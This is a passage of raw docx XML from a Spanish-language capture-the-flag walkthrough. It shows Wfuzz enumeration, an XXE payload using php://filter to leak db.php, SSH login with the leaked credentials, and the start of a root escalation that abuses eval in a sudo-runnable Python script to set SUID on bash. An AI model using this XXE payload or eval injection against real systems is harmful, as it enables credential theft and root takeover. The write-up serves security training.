    <w:p w14:paraId="460FC589" w14:textId="795CA6F7" w:rsidR="007659EE" w:rsidRDefault="007659EE" w:rsidP="00173B51">
      <w:r w:rsidRPr="007659EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="727E4CD6" wp14:editId="38A8C0C4">
            <wp:extent cx="5400040" cy="1623060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16096603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60316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0274" w14:textId="77777777" w:rsidR="007659EE" w:rsidRDefault="007659EE" w:rsidP="00173B51"/>
    <w:p w14:paraId="0E3370D6" w14:textId="662C19B9" w:rsidR="007659EE" w:rsidRDefault="007659EE" w:rsidP="00173B51">
      <w:r>
        <w:t xml:space="preserve">Se logra visualizar que no hay mucha información en el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_submit.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, pero ¿y si hubiera algún otro fichero </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> donde podamos obtener más información? Entonces es momento de utilizar nuevamente la herramienta de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wfuzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D2645F">
        <w:t xml:space="preserve"> Le agregamos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D2645F">
        <w:t>el</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D2645F">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D2645F">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D2645F">
        <w:t xml:space="preserve"> al final para buscar solamente archivos .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D2645F">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D2645F">
        <w:t xml:space="preserve"> existentes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03931DC0" w14:textId="3BD94FC9" w:rsidR="007659EE" w:rsidRDefault="00661DF7" w:rsidP="00173B51">
      <w:r w:rsidRPr="00661DF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD69F33" wp14:editId="790CB4B0">
            <wp:extent cx="5395239" cy="619125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="105556792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67926" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto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9217" b="89862" l="5330" r="96701">
                                  <a14:foregroundMark x1="5330" y1="47005" x2="8376" y2="47926"/>
                                  <a14:foregroundMark x1="92703" y1="31336" x2="96701" y2="4193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896" t="7282" r="959" b="11761"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5519615" cy="63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F7989" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRDefault="00D2645F" w:rsidP="00173B51"/>
    <w:p w14:paraId="3EE773EB" w14:textId="0318FE19" w:rsidR="00D2645F" w:rsidRDefault="00D2645F" w:rsidP="00173B51">
      <w:r>
        <w:t xml:space="preserve">Y en efecto, tenemos dos resultados: portal y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A566A73" w14:textId="03BF648E" w:rsidR="00577C2D" w:rsidRPr="00577C2D" w:rsidRDefault="00661DF7" w:rsidP="00173B51">
      <w:r w:rsidRPr="00661DF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60814612" wp14:editId="3F50567B">
            <wp:extent cx="5400040" cy="1026160"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="944151840" name="Imagen 1" descr="Imagen de la pantalla de un celul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51840" name="Imagen 1" descr="Imagen de la pantalla de un celular&#10;&#10;Descripción generada automáticamente con confianza baj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BFB2" w14:textId="77777777" w:rsidR="002952EF" w:rsidRDefault="002952EF" w:rsidP="00FA6809"/>
    <w:p w14:paraId="4338EE20" w14:textId="47DFDC89" w:rsidR="00D2645F" w:rsidRDefault="00D2645F" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Hacemos el mismo proceso que hicimos para leer el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_submit.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, pero ahora con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y lo mandamos como base64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3512ADE7" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D2645F" w:rsidP="00D2645F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xml  version</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="1.0" encoding="ISO-8859-1"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A653E8" w14:textId="6376F1F0" w:rsidR="00D2645F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D2645F" w:rsidP="00D2645F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [ &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM </w:t>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>://filter/read=convert.base64-encode/resource=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEDAEB8" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D2645F" w:rsidP="00D2645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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bugreport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C548E9B" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D2645F" w:rsidP="00D2645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&lt;title&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EF87E8" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D2645F" w:rsidP="00D2645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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DA093" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D2645F" w:rsidP="00D2645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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29462AAE" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRDefault="00D2645F" w:rsidP="00D2645F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D41F0F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;reward&gt;test&lt;/reward&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028D5DA1" w14:textId="77777777" w:rsidR="00D2645F" w:rsidRPr="00D41F0F" w:rsidRDefault="00D2645F" w:rsidP="00D2645F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61711B4A" w14:textId="1D0F1045" w:rsidR="00D2645F" w:rsidRPr="00D2645F" w:rsidRDefault="00D2645F" w:rsidP="00FA6809">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D2645F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65EFD7B1" wp14:editId="4BF247B1">
            <wp:extent cx="5400040" cy="2013625"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1015812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12030" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId50"/>
                    <a:srcRect b="34671"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="201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72D96" w14:textId="77777777" w:rsidR="000C007C" w:rsidRDefault="000C007C" w:rsidP="00FA6809">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B20CB84" w14:textId="53AFDB43" w:rsidR="005E1098" w:rsidRDefault="005E1098" w:rsidP="00FA6809">
      <w:r w:rsidRPr="005E1098">
        <w:t>Ahora visualizaremos el contenido d</w:t>
      </w:r>
      <w:r>
        <w:t>e la respuesta en base64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F83B1C" w14:textId="1B037014" w:rsidR="005E1098" w:rsidRDefault="005E1098" w:rsidP="00FA6809">
      <w:r w:rsidRPr="005E1098">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DEF6CB4" wp14:editId="1814ABC9">
            <wp:extent cx="5400040" cy="675005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18303177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1776" name="Imagen 1" descr="Interfaz de usuario gráfica,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CFB8" w14:textId="77777777" w:rsidR="005E1098" w:rsidRDefault="005E1098" w:rsidP="00FA6809"/>
    <w:p w14:paraId="4BA1A654" w14:textId="7CE467F3" w:rsidR="00C7172F" w:rsidRDefault="00C7172F" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Recordamos que teníamos el puerto 22-ssh y el 80-http abierto. Entonces, probaremos si esas credenciales son válidas si ingresamos por </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00923356">
        <w:t xml:space="preserve"> Además, recordamos que teníamos el usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00923356">
        <w:t>development</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00923356">
        <w:t xml:space="preserve">, por lo que si no funciona con el usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00923356">
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00923356">
        <w:t xml:space="preserve"> podríamos probar con el otro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0637CE" w14:textId="3495E81B" w:rsidR="00923356" w:rsidRDefault="00923356" w:rsidP="00923356">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00923356">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F612AC" wp14:editId="610539B4">
            <wp:extent cx="2349281" cy="2334639"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="9226861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86119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5463" cy="23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8444" w14:textId="0447363A" w:rsidR="00923356" w:rsidRDefault="00923356" w:rsidP="00FA6809">
      <w:r>
        <w:t>Y en efecto, tenemos acceso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A49187F" w14:textId="4DD2FE2F" w:rsidR="00C7172F" w:rsidRDefault="00C4061D" w:rsidP="00FA6809">
      <w:r>
        <w:t>Ahora si visualizamos los ficheros vemos lo siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4679EFCD" w14:textId="2BADFEFA" w:rsidR="00C4061D" w:rsidRDefault="00C4061D" w:rsidP="006F5791">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C4061D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D1B880C" wp14:editId="343F1C49">
            <wp:extent cx="4083260" cy="1085906"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1458638011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38011" name="Imagen 1" descr="Texto, Chat o mensaje de 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1D5C" w14:textId="3287DDA0" w:rsidR="008F15EB" w:rsidRPr="006E2852" w:rsidRDefault="00C4061D" w:rsidP="00C4061D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E2852">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ya tenemos la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E2852">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E2852">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> para un usuario normal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598B504E" w14:textId="33585EFF" w:rsidR="00FA6809" w:rsidRPr="00206A93" w:rsidRDefault="00FA6809" w:rsidP="00FA6809">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc138803587"/>
      <w:r w:rsidRPr="00206A93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Escalada de privilegios para ser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206A93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22C35E58" w14:textId="77777777" w:rsidR="00CA0FE8" w:rsidRPr="00CA0FE8" w:rsidRDefault="00CA0FE8" w:rsidP="00FA6809">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E13B11" w14:textId="6152F26E" w:rsidR="00BA520F" w:rsidRDefault="00CA0FE8" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Ahora </w:t>
      </w:r>
      <w:r w:rsidR="00BA520F">
        <w:t>si ingresamos el comando sudo -l tenemos el siguiente mensaje:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07746808" w14:textId="0F177038" w:rsidR="00BA520F" w:rsidRDefault="00BA520F" w:rsidP="00FA6809">
      <w:r w:rsidRPr="00BA520F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1138D5AF" wp14:editId="65909268">
            <wp:extent cx="5400040" cy="578485"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1174091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911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0855" w14:textId="6BAE95A0" w:rsidR="00BA520F" w:rsidRDefault="00BA520F" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Entonces vamos a inspeccionar el código que está en la ruta: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA520F">
        <w:t>/opt/skytrain_inc/ticketValidator.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8247B0" w14:textId="11087B7D" w:rsidR="00BA520F" w:rsidRDefault="008F15EB" w:rsidP="00FA6809">
      <w:r w:rsidRPr="008F15EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D76223C" wp14:editId="72C4449E">
            <wp:extent cx="4910445" cy="6817112"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3175"/>
            <wp:docPr id="2738634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63405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9039" cy="68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E7AA" w14:textId="6FADAF47" w:rsidR="008F15EB" w:rsidRDefault="008F15EB" w:rsidP="00FA6809"/>
    <w:p w14:paraId="71BB92A1" w14:textId="66C6F1C3" w:rsidR="008F15EB" w:rsidRDefault="00DA3052" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Si analizamos el código, vemos que la primera condicional es que al ingresar un archivo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tiene que tener</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> extensión .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>md</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, caso contrario se cierra el programa con un mensaje de “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wrong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">”. Luego, una vez ingresado nos pide que debe tener de manera obligatoria 3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> por línea:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A46FBDC" w14:textId="0EAA6C03" w:rsidR="00DA3052" w:rsidRDefault="00DA3052" w:rsidP="00DA3052">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sktrain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Inc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E234ECF" w14:textId="064C3093" w:rsidR="00DA3052" w:rsidRDefault="00DA3052" w:rsidP="00DA3052">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">## Ticket </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E2E5C7C" w14:textId="51E831C6" w:rsidR="00DA3052" w:rsidRDefault="00DA3052" w:rsidP="00DA3052">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">__Ticket </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:_</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67538622" w14:textId="09DEC97F" w:rsidR="00FA6809" w:rsidRDefault="00A51054" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Todo eso debemos ponerlo en el archivo que vamos a crear, para este ejercicio le pondremos el nombre de </w:t>
      </w:r>
      <w:r w:rsidRPr="00A51054">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hola.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C569D5C" w14:textId="3F57FAAD" w:rsidR="00A51054" w:rsidRDefault="00A51054" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Ahora, lo que vamos hacer es evaluar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x.startswith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de manera que quede de la siguiente manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7FE705" w14:textId="3D1F1585" w:rsidR="00A51054" w:rsidRDefault="00A51054" w:rsidP="00FA6809">
      <w:r w:rsidRPr="00A51054">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="567F34EE" wp14:editId="14E5FA1F">
            <wp:extent cx="5400040" cy="837565"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="12193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88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73A6" w14:textId="77777777" w:rsidR="00A51054" w:rsidRDefault="00A51054" w:rsidP="00FA6809"/>
    <w:p w14:paraId="1F5AB540" w14:textId="4731A088" w:rsidR="00FA6809" w:rsidRDefault="00A51054" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Finalmente, como tenemos el método </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A56A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, podemos concatenarlo importando la librería </w:t>
      </w:r>
      <w:r w:rsidRPr="005A56A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, de modo que se estaría ejecutando también a la par. </w:t>
      </w:r>
      <w:r w:rsidR="005A56A4">
        <w:t xml:space="preserve">Como podemos ejecutar el script como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A56A4">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A56A4">
        <w:t xml:space="preserve">, una vía potencial es asignarle el permiso SUID a la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A56A4">
        <w:t>bash</w:t>
      </w:r>
